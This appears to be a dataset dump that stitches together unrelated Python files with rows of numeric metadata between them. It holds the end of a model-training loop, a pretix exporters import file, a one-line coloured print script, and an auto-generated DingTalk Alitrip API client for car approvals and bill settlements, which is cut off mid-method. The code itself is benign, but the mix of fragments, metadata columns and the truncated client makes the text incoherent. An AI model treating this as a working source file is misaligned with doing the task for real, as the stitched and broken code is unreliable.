        if pivot_loss - cur_loss > epsilon_thres:
            pivot_loss = cur_loss
            stop_epoch = epoch_i + trial_epochs
        # With log_cutoff 1 nothing was reliably displayed; one epoch only.
        if log_cutoff == 1:
            break
    true_loss = true_loss_fn(best_model,
                             data.validation,
                             cutoff)
    result = {
        'model': best_model,
        'estimated_loss': best_loss,
        'true_loss': true_loss,
        'epoch': best_epoch,
        'total_time_spend': time.time()-start_time,
        'time_per_epoch': (time.time()-start_time)/float(epoch_i),
        'learning_rate': learning_rate,
        'trial_epochs': trial_epochs,
        'learning_rate_decay': learning_rate_decay,
    }
    # print(learning_rate, clip_thres, best_epoch, best_loss, true_loss)
    return result
| 34.300265
| 126
| 0.618256
| 3,633
| 25,931
| 4.064134
| 0.058904
| 0.013884
| 0.021131
| 0.004876
| 0.828717
| 0.796004
| 0.759499
| 0.74128
| 0.72042
| 0.704775
| 0
| 0.015275
| 0.26532
| 25,931
| 756
| 127
| 34.300265
| 0.75975
| 0.034476
| 0
| 0.738983
| 0
| 0
| 0.045954
| 0
| 0
| 0
| 0
| 0
| 0.001695
| 1
| 0.028814
| false
| 0
| 0.005085
| 0.001695
| 0.062712
| 0.015254
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa774ae6cfc9c041d8585dc35f9c0d4842c28ba4
| 152
|
py
|
Python
|
src/pretix/base/exporters/__init__.py
|
upsidedownpancake/pretix
|
bfeeb1028c9eccab4936029db7c38edd4cd5aad5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/pretix/base/exporters/__init__.py
|
upsidedownpancake/pretix
|
bfeeb1028c9eccab4936029db7c38edd4cd5aad5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/pretix/base/exporters/__init__.py
|
upsidedownpancake/pretix
|
bfeeb1028c9eccab4936029db7c38edd4cd5aad5
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2017-08-09T17:11:28.000Z
|
2017-08-09T17:11:28.000Z
|
from .answers import * # noqa
from .invoices import * # noqa
from .json import * # noqa
from .mail import * # noqa
from .orderlist import * # noqa
| 25.333333
| 32
| 0.671053
| 20
| 152
| 5.1
| 0.4
| 0.490196
| 0.54902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230263
| 152
| 5
| 33
| 30.4
| 0.871795
| 0.157895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aa9fd00bb9b943777133b360cb069bd1b9be8827
| 40
|
py
|
Python
|
exercicios-Python/ex001.py
|
marcelo-py/Exercicios-Python
|
d654d54821983897dbc377a2d3db97671dd75b5b
|
[
"MIT"
] | null | null | null |
exercicios-Python/ex001.py
|
marcelo-py/Exercicios-Python
|
d654d54821983897dbc377a2d3db97671dd75b5b
|
[
"MIT"
] | null | null | null |
exercicios-Python/ex001.py
|
marcelo-py/Exercicios-Python
|
d654d54821983897dbc377a2d3db97671dd75b5b
|
[
"MIT"
] | null | null | null |
# Exercise 001: print a greeting wrapped in ANSI escape codes
# (\033[1;33;45m = bold yellow text on a magenta background; \033[m resets).
print('\033[1;33;45mOlá, mundo!\033[m')
| 20
| 39
| 0.65
| 8
| 40
| 3.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.289474
| 0.05
| 40
| 1
| 40
| 40
| 0.394737
| 0
| 0
| 0
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
aaaa1f7d7f5cf2285ef082456e4f02ad6746edf6
| 52,730
|
py
|
Python
|
dingtalk/python/alibabacloud_dingtalk/alitrip_1_0/client.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 15
|
2020-08-27T04:10:26.000Z
|
2022-03-07T06:25:42.000Z
|
dingtalk/python/alibabacloud_dingtalk/alitrip_1_0/client.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 1
|
2020-09-27T01:30:46.000Z
|
2021-12-29T09:15:34.000Z
|
dingtalk/python/alibabacloud_dingtalk/alitrip_1_0/client.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 5
|
2020-08-27T04:07:44.000Z
|
2021-12-03T02:55:20.000Z
|
# -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.core import TeaCore
from alibabacloud_tea_openapi.client import Client as OpenApiClient
from alibabacloud_tea_openapi import models as open_api_models
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_dingtalk.alitrip_1_0 import models as dingtalkalitrip__1__0_models
from alibabacloud_tea_util import models as util_models
from alibabacloud_openapi_util.client import Client as OpenApiUtilClient
class Client(OpenApiClient):
"""
*\
"""
def __init__(
self,
config: open_api_models.Config,
):
super().__init__(config)
self._endpoint_rule = ''
if UtilClient.empty(self._endpoint):
self._endpoint = 'api.dingtalk.com'
def approve_city_car_apply(
self,
request: dingtalkalitrip__1__0_models.ApproveCityCarApplyRequest,
) -> dingtalkalitrip__1__0_models.ApproveCityCarApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.ApproveCityCarApplyHeaders()
return self.approve_city_car_apply_with_options(request, headers, runtime)
async def approve_city_car_apply_async(
self,
request: dingtalkalitrip__1__0_models.ApproveCityCarApplyRequest,
) -> dingtalkalitrip__1__0_models.ApproveCityCarApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.ApproveCityCarApplyHeaders()
return await self.approve_city_car_apply_with_options_async(request, headers, runtime)
def approve_city_car_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.ApproveCityCarApplyRequest,
headers: dingtalkalitrip__1__0_models.ApproveCityCarApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.ApproveCityCarApplyResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.corp_id):
body['corpId'] = request.corp_id
if not UtilClient.is_unset(request.operate_time):
body['operateTime'] = request.operate_time
if not UtilClient.is_unset(request.remark):
body['remark'] = request.remark
if not UtilClient.is_unset(request.status):
body['status'] = request.status
if not UtilClient.is_unset(request.third_part_apply_id):
body['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_corp_id):
body['dingCorpId'] = request.ding_corp_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.ApproveCityCarApplyResponse(),
self.do_roarequest('ApproveCityCarApply', 'alitrip_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/alitrip/cityCarApprovals', 'json', req, runtime)
)
async def approve_city_car_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.ApproveCityCarApplyRequest,
headers: dingtalkalitrip__1__0_models.ApproveCityCarApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.ApproveCityCarApplyResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.corp_id):
body['corpId'] = request.corp_id
if not UtilClient.is_unset(request.operate_time):
body['operateTime'] = request.operate_time
if not UtilClient.is_unset(request.remark):
body['remark'] = request.remark
if not UtilClient.is_unset(request.status):
body['status'] = request.status
if not UtilClient.is_unset(request.third_part_apply_id):
body['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_corp_id):
body['dingCorpId'] = request.ding_corp_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.ApproveCityCarApplyResponse(),
await self.do_roarequest_async('ApproveCityCarApply', 'alitrip_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/alitrip/cityCarApprovals', 'json', req, runtime)
)
def bill_settement_hotel(
self,
request: dingtalkalitrip__1__0_models.BillSettementHotelRequest,
) -> dingtalkalitrip__1__0_models.BillSettementHotelResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementHotelHeaders()
return self.bill_settement_hotel_with_options(request, headers, runtime)
async def bill_settement_hotel_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementHotelRequest,
) -> dingtalkalitrip__1__0_models.BillSettementHotelResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementHotelHeaders()
return await self.bill_settement_hotel_with_options_async(request, headers, runtime)
def bill_settement_hotel_with_options(
self,
request: dingtalkalitrip__1__0_models.BillSettementHotelRequest,
headers: dingtalkalitrip__1__0_models.BillSettementHotelHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementHotelResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementHotelResponse(),
self.do_roarequest('BillSettementHotel', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/hotels', 'json', req, runtime)
)
async def bill_settement_hotel_with_options_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementHotelRequest,
headers: dingtalkalitrip__1__0_models.BillSettementHotelHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementHotelResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementHotelResponse(),
await self.do_roarequest_async('BillSettementHotel', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/hotels', 'json', req, runtime)
)
def get_flight_exceed_apply(
self,
request: dingtalkalitrip__1__0_models.GetFlightExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.GetFlightExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.GetFlightExceedApplyHeaders()
return self.get_flight_exceed_apply_with_options(request, headers, runtime)
async def get_flight_exceed_apply_async(
self,
request: dingtalkalitrip__1__0_models.GetFlightExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.GetFlightExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.GetFlightExceedApplyHeaders()
return await self.get_flight_exceed_apply_with_options_async(request, headers, runtime)
def get_flight_exceed_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.GetFlightExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.GetFlightExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.GetFlightExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.GetFlightExceedApplyResponse(),
self.do_roarequest('GetFlightExceedApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/exceedapply/getFlight', 'json', req, runtime)
)
async def get_flight_exceed_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.GetFlightExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.GetFlightExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.GetFlightExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.GetFlightExceedApplyResponse(),
await self.do_roarequest_async('GetFlightExceedApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/exceedapply/getFlight', 'json', req, runtime)
)
def bill_settement_car(
self,
request: dingtalkalitrip__1__0_models.BillSettementCarRequest,
) -> dingtalkalitrip__1__0_models.BillSettementCarResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementCarHeaders()
return self.bill_settement_car_with_options(request, headers, runtime)
async def bill_settement_car_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementCarRequest,
) -> dingtalkalitrip__1__0_models.BillSettementCarResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementCarHeaders()
return await self.bill_settement_car_with_options_async(request, headers, runtime)
def bill_settement_car_with_options(
self,
request: dingtalkalitrip__1__0_models.BillSettementCarRequest,
headers: dingtalkalitrip__1__0_models.BillSettementCarHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementCarResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementCarResponse(),
self.do_roarequest('BillSettementCar', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/cars', 'json', req, runtime)
)
async def bill_settement_car_with_options_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementCarRequest,
headers: dingtalkalitrip__1__0_models.BillSettementCarHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementCarResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementCarResponse(),
await self.do_roarequest_async('BillSettementCar', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/cars', 'json', req, runtime)
)
def bill_settement_btrip_train(
self,
request: dingtalkalitrip__1__0_models.BillSettementBtripTrainRequest,
) -> dingtalkalitrip__1__0_models.BillSettementBtripTrainResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementBtripTrainHeaders()
return self.bill_settement_btrip_train_with_options(request, headers, runtime)
async def bill_settement_btrip_train_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementBtripTrainRequest,
) -> dingtalkalitrip__1__0_models.BillSettementBtripTrainResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementBtripTrainHeaders()
return await self.bill_settement_btrip_train_with_options_async(request, headers, runtime)
def bill_settement_btrip_train_with_options(
self,
request: dingtalkalitrip__1__0_models.BillSettementBtripTrainRequest,
headers: dingtalkalitrip__1__0_models.BillSettementBtripTrainHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementBtripTrainResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementBtripTrainResponse(),
self.do_roarequest('BillSettementBtripTrain', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/btripTrains', 'json', req, runtime)
)
async def bill_settement_btrip_train_with_options_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementBtripTrainRequest,
headers: dingtalkalitrip__1__0_models.BillSettementBtripTrainHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementBtripTrainResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementBtripTrainResponse(),
await self.do_roarequest_async('BillSettementBtripTrain', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/btripTrains', 'json', req, runtime)
)
def sync_exceed_apply(
self,
request: dingtalkalitrip__1__0_models.SyncExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.SyncExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.SyncExceedApplyHeaders()
return self.sync_exceed_apply_with_options(request, headers, runtime)
async def sync_exceed_apply_async(
self,
request: dingtalkalitrip__1__0_models.SyncExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.SyncExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.SyncExceedApplyHeaders()
return await self.sync_exceed_apply_with_options_async(request, headers, runtime)
def sync_exceed_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.SyncExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.SyncExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.SyncExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.remark):
query['remark'] = request.remark
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.thirdparty_flow_id):
query['thirdpartyFlowId'] = request.thirdparty_flow_id
if not UtilClient.is_unset(request.user_id):
query['userId'] = request.user_id
if not UtilClient.is_unset(request.status):
query['status'] = request.status
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.SyncExceedApplyResponse(),
self.do_roarequest('SyncExceedApply', 'alitrip_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/alitrip/exceedapply/sync', 'json', req, runtime)
)
async def sync_exceed_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.SyncExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.SyncExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.SyncExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.remark):
query['remark'] = request.remark
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.thirdparty_flow_id):
query['thirdpartyFlowId'] = request.thirdparty_flow_id
if not UtilClient.is_unset(request.user_id):
query['userId'] = request.user_id
if not UtilClient.is_unset(request.status):
query['status'] = request.status
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.SyncExceedApplyResponse(),
await self.do_roarequest_async('SyncExceedApply', 'alitrip_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/alitrip/exceedapply/sync', 'json', req, runtime)
)
def add_city_car_apply(
self,
request: dingtalkalitrip__1__0_models.AddCityCarApplyRequest,
) -> dingtalkalitrip__1__0_models.AddCityCarApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.AddCityCarApplyHeaders()
return self.add_city_car_apply_with_options(request, headers, runtime)
async def add_city_car_apply_async(
self,
request: dingtalkalitrip__1__0_models.AddCityCarApplyRequest,
) -> dingtalkalitrip__1__0_models.AddCityCarApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.AddCityCarApplyHeaders()
return await self.add_city_car_apply_with_options_async(request, headers, runtime)
def add_city_car_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.AddCityCarApplyRequest,
headers: dingtalkalitrip__1__0_models.AddCityCarApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.AddCityCarApplyResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.cause):
body['cause'] = request.cause
if not UtilClient.is_unset(request.city):
body['city'] = request.city
if not UtilClient.is_unset(request.corp_id):
body['corpId'] = request.corp_id
if not UtilClient.is_unset(request.date):
body['date'] = request.date
if not UtilClient.is_unset(request.project_code):
body['projectCode'] = request.project_code
if not UtilClient.is_unset(request.project_name):
body['projectName'] = request.project_name
if not UtilClient.is_unset(request.status):
body['status'] = request.status
if not UtilClient.is_unset(request.third_part_apply_id):
body['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.third_part_cost_center_id):
body['thirdPartCostCenterId'] = request.third_part_cost_center_id
if not UtilClient.is_unset(request.third_part_invoice_id):
body['thirdPartInvoiceId'] = request.third_part_invoice_id
if not UtilClient.is_unset(request.times_total):
body['timesTotal'] = request.times_total
if not UtilClient.is_unset(request.times_type):
body['timesType'] = request.times_type
if not UtilClient.is_unset(request.times_used):
body['timesUsed'] = request.times_used
if not UtilClient.is_unset(request.title):
body['title'] = request.title
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_corp_id):
body['dingCorpId'] = request.ding_corp_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.finished_date):
body['finishedDate'] = request.finished_date
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.AddCityCarApplyResponse(),
self.do_roarequest('AddCityCarApply', 'alitrip_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/alitrip/cityCarApprovals', 'json', req, runtime)
)
async def add_city_car_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.AddCityCarApplyRequest,
headers: dingtalkalitrip__1__0_models.AddCityCarApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.AddCityCarApplyResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.cause):
body['cause'] = request.cause
if not UtilClient.is_unset(request.city):
body['city'] = request.city
if not UtilClient.is_unset(request.corp_id):
body['corpId'] = request.corp_id
if not UtilClient.is_unset(request.date):
body['date'] = request.date
if not UtilClient.is_unset(request.project_code):
body['projectCode'] = request.project_code
if not UtilClient.is_unset(request.project_name):
body['projectName'] = request.project_name
if not UtilClient.is_unset(request.status):
body['status'] = request.status
if not UtilClient.is_unset(request.third_part_apply_id):
body['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.third_part_cost_center_id):
body['thirdPartCostCenterId'] = request.third_part_cost_center_id
if not UtilClient.is_unset(request.third_part_invoice_id):
